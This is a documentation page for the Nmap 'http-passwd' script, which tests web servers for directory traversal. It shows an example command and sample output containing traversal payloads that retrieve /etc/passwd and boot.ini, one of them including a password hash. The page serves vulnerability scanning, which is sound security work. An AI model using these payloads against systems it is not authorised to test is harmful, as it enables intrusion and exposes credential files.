File http-passwd
Download: http://nmap.org/svn/scripts/http-passwd.nse
User Summary
Checks if a web server is vulnerable to directory traversal by attempting to
retrieve /etc/passwd or \boot.ini using various traversal methods such as
requesting ../../../../etc/passwd.
Script Arguments
http-max-cache-size, http.useragent, pipeline
See the documentation for the http library.Example Usage
nmap -sV --script=http-passwd <target>
Script Output
80/tcp open http | http-passwd: Directory traversal found. | Payload: "index.html?../../../../../boot.ini" | Printing first 250 bytes: | [boot loader] | timeout=30 | default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS | [operating systems] |_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect 80/tcp open http | http-passwd: Directory traversal found. | Payload: "../../../../../../../../../../etc/passwd" | Printing first 250 bytes: | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh | sshd:*:65532:65534::/:/bin/false | ftp:*:65533:65534::/:/bin/false |_nobody:*:65534:65534::/:/bin/false
Requires
Author: Kris Katterjohn, Ange Gutek
License: Same as Nmap--See http://nmap.org/book/man-legal.html